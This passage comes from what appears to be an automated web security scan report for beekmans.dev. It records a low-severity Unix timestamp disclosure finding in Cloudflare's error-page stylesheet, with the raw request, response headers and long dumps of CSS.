.cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#cf-wrapper .cf-btn-important:hover{background-color:#de5052;border-color:#bd2426;color:#fff}#cf-wrapper .cf-btn-danger.active,#cf-wrapper .cf-btn-danger:active,#cf-wrapper .cf-btn-danger:focus,#cf-wrapper .cf-btn-error.active,#cf-wrapper .cf-btn-error:active,#cf-wrapper .cf-btn-error:focus,#cf-wrapper .cf-btn-important.active,#cf-wrapper .cf-btn-important:active,#cf-wrapper .cf-btn-important:focus{background-color:#de5052;border-color:#521010;color:#fff}#cf-wrapper .cf-btn-accept,#cf-wrapper .cf-btn-success{background-color:#9bca3e;border:1px solid transparent;color:#fff}#cf-wrapper .cf-btn-accept:hover,#cf-wrapper .cf-btn-success:hover{background-color:#bada7a;border:1px solid #9bca3e;color:#fff}#cf-wrapper .active.cf-btn-accept,#cf-wrapper .cf-btn-accept:active,#cf-wrapper .cf-btn-accept:focus,#cf-wrapper .cf-btn-success.active,#cf-wrapper .cf-btn-success:active,#cf-wrapper .cf-btn-success:focus{background-color:#bada7a;border:1px solid #516b1d;color:#fff}#cf-wrapper .cf-btn-accept{color:transparent;font-size:0;height:36.38px;overflow:hidden;position:relative;text-indent:0;width:36.38px;white-space:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!important;outline:0!important;padding:.45em .75em!important;vertical-align:middle!important;display:-moz-inline-stack;display:inline-block;zoom:1;box-sizing:border-box;-webkit-transition:all .2s ease;transition:all .2s ease;border-radius:2px}#cf-wrapper input:hover,#cf-wrapper select:hover,#cf-wrapper textarea:hover{border-color:gray}#cf-wrapper input:focus,#cf-wrapper select:focus,#cf-wrapper textarea:focus{border-color:#2f7bbf;outline:0;box-shadow:0 0 8px rgba(47,123,191,.5)}#cf-wrapper fieldset{width:100%}#cf-wrapper label{display:block;font-size:13px;margin-bottom:.38333em}#cf-wrapper .cf-form-stacked .select2-container,#cf-wrapper .cf-form-stacked input,#cf-wrapper .cf-form-stacked select,#cf-wrapper .cf-form-stacked textarea{display:block;width:100%}#cf-wrapper .cf-form-stacked input[type=button],#cf-wrapper .cf-form-stacked input[type=checkbox],#cf-wrapper .cf-form-stacked input[type=submit]{display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1;width:auto}#cf-wrapper .cf-form-actions{text-align:right}#cf-wrapper .cf-alert{background-color:#f9b169;border:1px solid #904b06;color:#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;padding:0;position:relative;right:-18.75px;top:0}#cf-wrapper .cf-alert .cf-close:hover{background-color:transparent;border-color:currentColor;color:inherit}#cf-wrapper .cf-alert-danger,#cf-wrapper .cf-alert-error{background-color:#de5052;border-color:#521010;color:#fff}#cf-wrapper .cf-alert-success{background-color:#bada7a;border-color:#516b1d;color:#516b1d}#cf-wrapper .cf-alert-warning{background-color:#f9b169;border-color:#904b06;color:#404040}#cf-wrapper .cf-alert-info{background-color:#62a1d8;border-color:#163959;color:#163959}#cf-wrapper .cf-alert-nonessential{background-color:#ebebeb;border-color:#999;color:#404040}#cf-wrapper .cf-icon-exclamation-sign{background:url(/cdn-cgi/images/icon-exclamation.png?1376755637) 50% no-repeat;height:54px;width:54px;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1}#cf-wrapper h1 .cf-icon-exclamation-sign{margin-top:-10px}#cf-wrapper #cf-error-banner{background-color:#fff;border-bottom:3px solid #f68b1f;padding:15px 15px 20px;position:relative;z-index:999999999;box-shadow:0 2px 8px rgba(0,0,0,.2)}#cf-wrapper #cf-error-banner h4,#cf-wrapper #cf-error-banner p{display:-moz-inline-stack;display:inline-block;vertical-align:bottom;zoom:1}#cf-wrapper #cf-error-banner h4{color:#2f7bbf;font-weight:400;font-size:20px;line-height:1;vertical-align:baseline}#cf-wrapper #cf-error-banner .cf-error-actions{margin-bottom:10px;text-align:center;width:100%}#cf-wrapper #cf-error-banner .cf-error-actions a{display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1}#cf-wrapper #cf-error-banner .cf-error-actions a+a{margin-left:10px}#cf-wrapper #cf-error-banner .cf-error-actions .cf-btn-accept,#cf-wrapper #cf-error-banner .cf-error-actions .cf-btn-success{color:#fff}#cf-wrapper #cf-error-banner .error-header-desc{text-align:left}#cf-wrapper #cf-error-banner .cf-close{color:#999;cursor:pointer;display:inline-block;font-size:34.5px;float:none;font-weight:700;height:22.5px;line-height:.6;overflow:hidden;position:absolute;right:20px;top:25px;text-indent:200%;width:22.5px}#cf-wrapper #cf-error-banner .cf-close:hover{color:gray}#cf-wrapper #cf-error-banner .cf-close:before{content:"\00D7";left:0;height:100%;position:absolute;text-align:center;text-indent:0;top:0;width:100%}#cf-inline-error-wrapper{box-shadow:0 2px 10px rgba(0,0,0,.5)}#cf-wrapper #cf-error-details{background:#fff}#cf-wrapper #cf-error-details .cf-error-overview{padding:25px 0 0}#cf-wrapper #cf-error-details .cf-error-overview h1,#cf-wrapper #cf-error-details .cf-error-overview h2{font-weight:300}#cf-wrapper #cf-error-details .cf-error-overview h2{margin-top:0}#cf-wrapper #cf-error-details .cf-highlight{background:#ebebeb;overflow-x:hidden;padding:30px 0;background-image:-webkit-gradient(linear,left top, left bottom,from(#dedede),color-stop(3%, #ebebeb),color-stop(97%, #ebebeb),to(#dedede));background-image:linear-gradient(top,#dedede,#ebebeb 3%,#ebebeb 97%,#dedede)}#cf-wrapper #cf-error-details .cf-highlight h3{color:#999;font-weight:300}#cf-wrapper #cf-error-details .cf-highlight .cf-column:last-child{padding-bottom:0}#cf-wrapper #cf-error-details .cf-highlight .cf-highlight-inverse{background-color:#fff;padding:15px;border-radius:2px}#cf-wrapper #cf-error-details .cf-status-display h3{margin-top:.5em}#cf-wrapper #cf-error-details .cf-status-label{color:#9bca3e;font-size:1.46667em}#cf-wrapper #cf-error-details .cf-status-label,#cf-wrapper #cf-error-details .cf-status-name{display:inline}#cf-wrapper #cf-error-details .cf-status-item{display:block;position:relative;text-align:left}#cf-wrapper #cf-error-details .cf-status-item,#cf-wrapper #cf-error-details .cf-status-item.cf-column{padding-bottom:1.5em}#cf-wrapper #cf-error-details .cf-status-item.cf-error-source{display:block;text-align:center}#cf-wrapper #cf-error-details .cf-status-item.cf-error-source:after{bottom:-60px;content:"";display:none;border-bottom:18px solid #fff;border-left:20px solid transparent;border-right:20px solid transparent;height:0;left:50%;margin-left:-9px;position:absolute;right:50%;width:0}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item{border-top:1px solid #dedede;padding-top:1.5em}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item:before{background:url(/cdn-cgi/images/cf-icon-horizontal-arrow.png) no-repeat;content:"";display:block;left:0;position:absolute;top:25.67px}#cf-wrapper #cf-error-details .cf-error-source .cf-icon-error-container{height:85px;margin-bottom:2.5em}#cf-wrapper #cf-error-details .cf-error-source .cf-status-label{color:#bd2426}#cf-wrapper #cf-error-details .cf-error-source .cf-icon{display:block}#cf-wrapper #cf-error-details .cf-error-source .cf-icon-status{bottom:-10px;left:50%;top:auto;right:auto}#cf-wrapper #cf-error-details .cf-error-source .cf-status-label,#cf-wrapper #cf-error-details .cf-error-source .cf-status-name{display:block}#cf-wrapper #cf-error-details .cf-icon-error-container{height:auto;position:relative}#cf-wrapper #cf-error-details .cf-icon-status{display:block;margin-left:-24px;position:absolute;top:0;right:0}#cf-wrapper #cf-error-details .cf-icon{display:none;margin:0 auto}#cf-wrapper #cf-error-details .cf-status-desc{display:block;height:22.5px;overflow:hidden;text-overflow:ellipsis;width:100%;white-space:nowrap}#cf-wrapper #cf-error-details .cf-status-desc:empty{display:none}#cf-wrapper #cf-error-details .cf-error-footer{padding:1.33333em 0;border-top:1px solid #ebebeb;text-align:center}#cf-wrapper #cf-error-details .cf-error-footer p{font-size:13px}#cf-wrapper #cf-error-details .cf-error-footer select{margin:0!important}#cf-wrapper #cf-error-details .cf-footer-item{display:block;margin-bottom:5px;text-align:left}#cf-wrapper #cf-error-details .cf-footer-separator{display:none}#cf-wrapper #cf-error-details .cf-captcha-info{margin-bottom:10px;position:relative;text-align:center}#cf-wrapper #cf-error-details .cf-captcha-image{height:57px;width:300px}#cf-wrapper #cf-error-details .cf-captcha-actions{margin-top:15px}#cf-wrapper #cf-error-details .cf-captcha-actions a{font-size:0;height:36.38px;overflow:hidden;padding-left:1.2em;padding-right:1.2em;position:relative;text-indent:-9999px;width:36.38px;white-space:nowrap}#cf-wrapper #cf-error-details .cf-captcha-actions a.cf-icon-refresh span{background-position:0 -787px}#cf-wrapper #cf-error-details .cf-captcha-actions a.cf-icon-announce span{background-position:0 -767px}#cf-wrapper #cf-error-details .cf-captcha-actions a.cf-icon-question span{background-position:0 -827px}#cf-wrapper #cf-error-details .cf-screenshot-container{background:url(/cdn-cgi/images/browser-bar.png?1376755637) no-repeat #fff;max-height:400px;max-width:100%;overflow:hidden;padding-top:53px;width:960px;border-radius:5px 5px 0 0}#cf-wrapper #cf-error-details .cf-screenshot-container .cf-no-screenshot{background:url(/cdn-cgi/images/cf-no-screenshot-warn.png) no-repeat;display:block;height:158px;left:25%;margin-top:-79px;overflow:hidden;position:relative;top:50%;width:178px}#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container,#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container img,#recaptcha-widget .cf-alert,#recaptcha-widget .recaptcha_only_if_audio,.cf-cookie-error{display:none}#cf-wrapper #cf-error-details .cf-screenshot-container .cf-no-screenshot.error{background:url(/cdn-cgi/images/cf-no-screenshot-error.png) no-repeat;height:175px}#cf-wrapper #cf-error-details .cf-screenshot-container.cf-screenshot-full .cf-no-screenshot{left:50%;margin-left:-89px}.cf-captcha-info iframe{max-width:100%}#cf-wrapper .cf-icon-ok{background:url(/cdn-cgi/images/cf-icon-ok.png) no-repeat;height:48px;width:48px}#cf-wrapper .cf-icon-error{background:url(/cdn-cgi/images/cf-icon-error.png) no-repeat;height:48px;width:48px}#cf-wrapper .cf-icon-browser{background:url(/cdn-cgi/images/cf-icon-browser.png) no-repeat;height:80px;width:100px}#cf-wrapper .cf-icon-cloud{background:url(/cdn-cgi/images/cf-icon-cloud.png) no-repeat;height:77px;width:151px}#cf-wrapper .cf-icon-server{background:url(/cdn-cgi/images/cf-icon-server.png) no-repeat;height:75px;width:95px}#cf-wrapper .cf-icon-railgun{background-position:0 -848px;height:81px;width:95px}#cf-wrapper .cf-caret{border:.33333em solid transparent;border-top-color:inherit;content:"";height:0;width:0;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1}@media screen and (min-width:49.2em){#cf-wrapper #cf-error-details .cf-status-desc:empty,#cf-wrapper #cf-error-details .cf-status-item.cf-error-source:after,#cf-wrapper #cf-error-details .cf-status-item .cf-icon,#cf-wrapper #cf-error-details .cf-status-label,#cf-wrapper #cf-error-details .cf-status-name{display:block}#cf-wrapper .cf-wrapper{width:708px}#cf-wrapper #cf-error-banner{padding:20px 20px 25px}#cf-wrapper #cf-error-banner .cf-error-actions{margin-bottom:15px}#cf-wrapper #cf-error-banner .cf-error-header-desc h4{margin-right:.5em}#cf-wrapper #cf-error-details h1{font-size:4em}#cf-wrapper #cf-error-details .cf-error-overview{padding-top:2.33333em}#cf-wrapper #cf-error-details .cf-highlight{padding:4em 0}#cf-wrapper #cf-error-details .cf-status-item{text-align:center}#cf-wrapper #cf-error-details .cf-status-item,#cf-wrapper #cf-error-details .cf-status-item.cf-column{padding-bottom:0}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item{border:0;padding-top:0}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item:before{background-position:0 -544px;height:24.75px;margin-left:-37.5px;width:75px;background-size:131.25px auto}#cf-wrapper #cf-error-details .cf-icon-error-container{height:85px;margin-bottom:2.5em}#cf-wrapper #cf-error-details .cf-icon-status{bottom:-10px;left:50%;top:auto;right:auto}#cf-wrapper #cf-error-details .cf-error-footer{padding:2.66667em 0}#cf-wrapper #cf-error-details .cf-footer-item,#cf-wrapper #cf-error-details .cf-footer-separator{display:-moz-inline-stack;display:inline-block;vertical-align:baseline;zoom:1}#cf-wrapper #cf-error-details .cf-footer-separator{padding:0 .25em}#cf-wrapper #cf-error-details .cf-status-item.cloudflare-status:before{margin-left:-50px}#cf-wrapper #cf-error-details .cf-status-item.cloudflare-status+.status-item:before{margin-left:-25px}#cf-wrapper #cf-error-details .cf-screenshot-container{height:400px;margin-bottom:-4em;max-width:none}#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container,#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container img{display:block}}@media screen and (min-width:66em){#cf-wrapper .cf-wrapper{width:960px}#cf-wrapper #cf-error-banner .cf-close{position:relative;right:auto;top:auto}#cf-wrapper #cf-error-banner .cf-details{white-space:nowrap}#cf-wrapper #cf-error-banner .cf-details-link{padding-right:.5em}#cf-wrapper #cf-error-banner .cf-error-actions{float:right;margin-bottom:0;text-align:left;width:auto}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item:before{background-position:0 -734px;height:33px;margin-left:-50px;width:100px;background-size:auto}#cf-wrapper #cf-error-details .cf-status-item.cf-cloudflare-status:before{margin-left:-66.67px}#cf-wrapper #cf-error-details .cf-status-item.cf-cloudflare-status+.cf-status-item:before{margin-left:-37.5px}#cf-wrapper #cf-error-details .cf-captcha-image{float:left}#cf-wrapper #cf-error-details .cf-captcha-actions{position:absolute;top:0;right:0}}.no-js #cf-wrapper .js-only{display:none}#cf-wrapper #cf-error-details .heading-ray-id{font-family:monaco,courier,monospace;font-size:15px;white-space:nowrap}
          
          Evidence
          1376755637
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        28. GET https://beekmans.dev/cdn-cgi/styles/cf.errors.css
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          999999999, which evaluates to: 2001-09-09 03:46:39

          Request
          Request line and header section (279 bytes)
          GET https://beekmans.dev/cdn-cgi/styles/cf.errors.css HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/cdn-cgi/l/email-protection
          
          
          Request body (0 bytes)
          Response
          Status line and header section (416 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: text/css
          Content-Length: 23688
          Connection: keep-alive
          Last-Modified: Wed, 01 Dec 2021 12:20:23 GMT
          ETag: "61a76887-5c88"
          Server: cloudflare
          CF-RAY: 6b94a4806f2d0c09-AMS
          X-Frame-Options: DENY
          X-Content-Type-Options: nosniff
          Expires: Mon, 06 Dec 2021 11:56:08 GMT
          Cache-Control: max-age=7200
          Cache-Control: public
          Accept-Ranges: bytes
          
          
          Response body (23688 bytes)
          #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;border:0;font:inherit;font-size:100%;text-decoration:none;vertical-align:baseline}#cf-wrapper a img{border:none}#cf-wrapper article,#cf-wrapper aside,#cf-wrapper details,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper section,#cf-wrapper summary{display:block}#cf-wrapper .cf-columns:after,#cf-wrapper .cf-columns:before,#cf-wrapper .cf-section:after,#cf-wrapper .cf-section:before,#cf-wrapper .cf-wrapper:after,#cf-wrapper .cf-wrapper:before,#cf-wrapper .clearfix:after,#cf-wrapper .clearfix:before,#cf-wrapper section:after,#cf-wrapper section:before{content:" ";display:table}#cf-wrapper .cf-columns:after,#cf-wrapper .cf-section:after,#cf-wrapper .cf-wrapper:after,#cf-wrapper .clearfix:after,#cf-wrapper section:after{clear:both}#cf-wrapper{display:block;margin:0;padding:0;position:relative;text-align:left;width:100%;z-index:999999999;color:#404040!important;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif!important;font-size:15px!important;line-height:1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em}#cf-wrapper .cf-wrapper{margin-left:auto;margin-right:auto;width:90%}#cf-wrapper .cf-columns{display:block;list-style:none;padding:0;width:100%}#cf-wrapper .cf-columns img,#cf-wrapper .cf-columns input,#cf-wrapper .cf-columns object,#cf-wrapper .cf-columns select,#cf-wrapper .cf-columns textarea{max-width:100%}#cf-wrapper .cf-columns>.cf-column{float:left;padding-bottom:45px;width:100%;box-sizing:border-box}@media screen and (min-width:49.2em){#cf-wrapper .cf-columns.cols-2>.cf-column:nth-child(n+3),#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(n+4),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(n+3),#cf-wrapper .cf-columns.four>.cf-column:nth-child(n+3),#cf-wrapper .cf-columns.three>.cf-column:nth-child(n+4),#cf-wrapper .cf-columns.two>.cf-column:nth-child(n+3){padding-top:67.5px}#cf-wrapper .cf-columns>.cf-column{padding-bottom:0}#cf-wrapper .cf-columns.cols-2>.cf-column,#cf-wrapper .cf-columns.cols-4>.cf-column,#cf-wrapper .cf-columns.four>.cf-column,#cf-wrapper .cf-columns.two>.cf-column{padding-left:0;padding-right:22.5px;width:50%}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.two>.cf-column:nth-child(odd){clear:left}#cf-wrapper .cf-columns.cols-3>.cf-column,#cf-wrapper .cf-columns.three>.cf-column{padding-left:30px;width:33.3333333333333%}#cf-wrapper .cf-columns.cols-3>.cf-column:first-child,#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(3n+1),#cf-wrapper .cf-columns.three>.cf-column:first-child,#cf-wrapper .cf-columns.three>.cf-column:nth-child(3n+1){clear:left;padding-left:0;padding-right:30px}#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(3n+2),#cf-wrapper .cf-columns.three>.cf-column:nth-child(3n+2){padding-left:15px;padding-right:15px}#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(-n+3),#cf-wrapper .cf-columns.three>.cf-column:nth-child(-n+3){padding-top:0}}@media screen and (min-width:66em){#cf-wrapper .cf-columns>.cf-column{padding-bottom:0}#cf-wrapper .cf-columns.cols-4>.cf-column,#cf-wrapper .cf-columns.four>.cf-column{padding-left:33.75px;width:25%}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+1){clear:left;padding-left:0;padding-right:33.75px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+2),#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+2){padding-left:11.25px;padding-right:22.5px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+3),#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+3){padding-left:22.5px;padding-right:11.25px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(n+5),#cf-wrapper .cf-columns.four>.cf-column:nth-child(n+5){padding-top:67.5px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(-n+4),#cf-wrapper .cf-columns.four>.cf-column:nth-child(-n+4){padding-top:0}}#cf-wrapper a{background:0 0;border:0;color:#2f7bbf;outline:0;text-decoration:none;-webkit-transition:all .15s ease;transition:all .15s ease}#cf-wrapper a:hover{background:0 0;border:0;color:#f68b1f}#cf-wrapper a:focus{background:0 0;border:0;color:#62a1d8;outline:0}#cf-wrapper a:active{background:0 0;border:0;color:#c16508;outline:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper p{color:#404040;margin:0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrapper h3{font-size:25px;line-height:1.3}#cf-wrapper h4{font-size:20px;line-height:1.3}#cf-wrapper h5{font-size:15px}#cf-wrapper h6{font-size:13px}#cf-wrapper ol,#cf-wrapper ul{list-style:none;margin-left:3em}#cf-wrapper ul{list-style-type:disc}#cf-wrapper ol{list-style-type:decimal}#cf-wrapper em{font-style:italic}#cf-wrapper .cf-subheadline{color:#999;font-weight:300}#cf-wrapper .cf-text-error{color:#bd2426}#cf-wrapper .cf-text-success{color:#9bca3e}#cf-wrapper ol+h2,#cf-wrapper ol+h3,#cf-wrapper ol+h4,#cf-wrapper ol+h5,#cf-wrapper ol+h6,#cf-wrapper ol+p,#cf-wrapper p+dl,#cf-wrapper p+ol,#cf-wrapper p+p,#cf-wrapper p+table,#cf-wrapper p+ul,#cf-wrapper ul+h2,#cf-wrapper ul+h3,#cf-wrapper ul+h4,#cf-wrapper ul+h5,#cf-wrapper ul+h6,#cf-wrapper ul+p{margin-top:1.5em}#cf-wrapper h1+p,#cf-wrapper p+h1,#cf-wrapper p+h2,#cf-wrapper p+h3,#cf-wrapper p+h4,#cf-wrapper p+h5,#cf-wrapper p+h6{margin-top:1.25em}#cf-wrapper h1+h2,#cf-wrapper h1+h3,#cf-wrapper h2+h3,#cf-wrapper h3+h4,#cf-wrapper h4+h5{margin-top:.25em}#cf-wrapper h2+p{margin-top:1em}#cf-wrapper h1+h4,#cf-wrapper h1+h5,#cf-wrapper h1+h6,#cf-wrapper h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;color:#404040;font-size:14px;font-weight:400;line-height:1.2;margin:0;padding:.6em 1.33333em .53333em;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1;border-radius:2px;box-sizing:border-box;-webkit-transition:all .2s ease;transition:all .2s ease}#cf-wrapper .cf-btn:hover{background-color:#bfbfbf;border:1px solid #737373;color:#fff}#cf-wrapper .cf-btn:focus{color:inherit;outline:0;box-shadow:inset 0 0 4px rgba(0,0,0,.3)}#cf-wrapper .cf-btn.active,#cf-wrapper .cf-btn:active{background-color:#bfbfbf;border:1px solid #404040;color:#272727}#cf-wrapper .cf-btn::-moz-focus-inner{padding:0;border:0}#cf-wrapper .cf-btn .cf-caret{border-top-color:currentColor;margin-left:.25em;margin-top:.18333em}#cf-wrapper .cf-btn-primary{background-color:#2f7bbf;border:1px solid transparent;color:#fff}#cf-wrapper .cf-btn-primary:hover{background-color:#62a1d8;border:1px solid #2f7bbf;color:#fff}#cf-wrapper .cf-btn-primary.active,#cf-wrapper .cf-btn-primary:active,#cf-wrapper .cf-btn-primary:focus{background-color:#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#cf-wrapper .cf-btn-important:hover{background-color:#de5052;border-color:#bd2426;color:#fff}#cf-wrapper .cf-btn-danger.active,#cf-wrapper .cf-btn-danger:active,#cf-wrapper .cf-btn-danger:focus,#cf-wrapper .cf-btn-error.active,#cf-wrapper .cf-btn-error:active,#cf-wrapper .cf-btn-error:focus,#cf-wrapper .cf-btn-important.active,#cf-wrapper .cf-btn-important:active,#cf-wrapper .cf-btn-important:focus{background-color:#de5052;border-color:#521010;color:#fff}#cf-wrapper .cf-btn-accept,#cf-wrapper .cf-btn-success{background-color:#9bca3e;border:1px solid transparent;color:#fff}#cf-wrapper .cf-btn-accept:hover,#cf-wrapper .cf-btn-success:hover{background-color:#bada7a;border:1px solid #9bca3e;color:#fff}#cf-wrapper .active.cf-btn-accept,#cf-wrapper .cf-btn-accept:active,#cf-wrapper .cf-btn-accept:focus,#cf-wrapper .cf-btn-success.active,#cf-wrapper .cf-btn-success:active,#cf-wrapper .cf-btn-success:focus{background-color:#bada7a;border:1px solid #516b1d;color:#fff}#cf-wrapper .cf-btn-accept{color:transparent;font-size:0;height:36.38px;overflow:hidden;position:relative;text-indent:0;width:36.38px;white-space:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!important;outline:0!important;padding:.45em .75em!important;vertical-align:middle!important;display:-moz-inline-stack;display:inline-block;zoom:1;box-sizing:border-box;-webkit-transition:all .2s ease;transition:all .2s ease;border-radius:2px}#cf-wrapper input:hover,#cf-wrapper select:hover,#cf-wrapper textarea:hover{border-color:gray}#cf-wrapper input:focus,#cf-wrapper select:focus,#cf-wrapper textarea:focus{border-color:#2f7bbf;outline:0;box-shadow:0 0 8px rgba(47,123,191,.5)}#cf-wrapper fieldset{width:100%}#cf-wrapper label{display:block;font-size:13px;margin-bottom:.38333em}#cf-wrapper .cf-form-stacked .select2-container,#cf-wrapper .cf-form-stacked input,#cf-wrapper .cf-form-stacked select,#cf-wrapper .cf-form-stacked textarea{display:block;width:100%}#cf-wrapper .cf-form-stacked input[type=button],#cf-wrapper .cf-form-stacked input[type=checkbox],#cf-wrapper .cf-form-stacked input[type=submit]{display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1;width:auto}#cf-wrapper .cf-form-actions{text-align:right}#cf-wrapper .cf-alert{background-color:#f9b169;border:1px solid #904b06;color:#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;padding:0;position:relative;right:-18.75px;top:0}#cf-wrapper .cf-alert .cf-close:hover{background-color:transparent;border-color:currentColor;color:inherit}#cf-wrapper .cf-alert-danger,#cf-wrapper .cf-alert-error{background-color:#de5052;border-color:#521010;color:#fff}#cf-wrapper .cf-alert-success{background-color:#bada7a;border-color:#516b1d;color:#516b1d}#cf-wrapper .cf-alert-warning{background-color:#f9b169;border-color:#904b06;color:#404040}#cf-wrapper .cf-alert-info{background-color:#62a1d8;border-color:#163959;color:#163959}#cf-wrapper .cf-alert-nonessential{background-color:#ebebeb;border-color:#999;color:#404040}#cf-wrapper .cf-icon-exclamation-sign{background:url(/cdn-cgi/images/icon-exclamation.png?1376755637) 50% no-repeat;height:54px;width:54px;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1}#cf-wrapper h1 .cf-icon-exclamation-sign{margin-top:-10px}#cf-wrapper #cf-error-banner{background-color:#fff;border-bottom:3px solid #f68b1f;padding:15px 15px 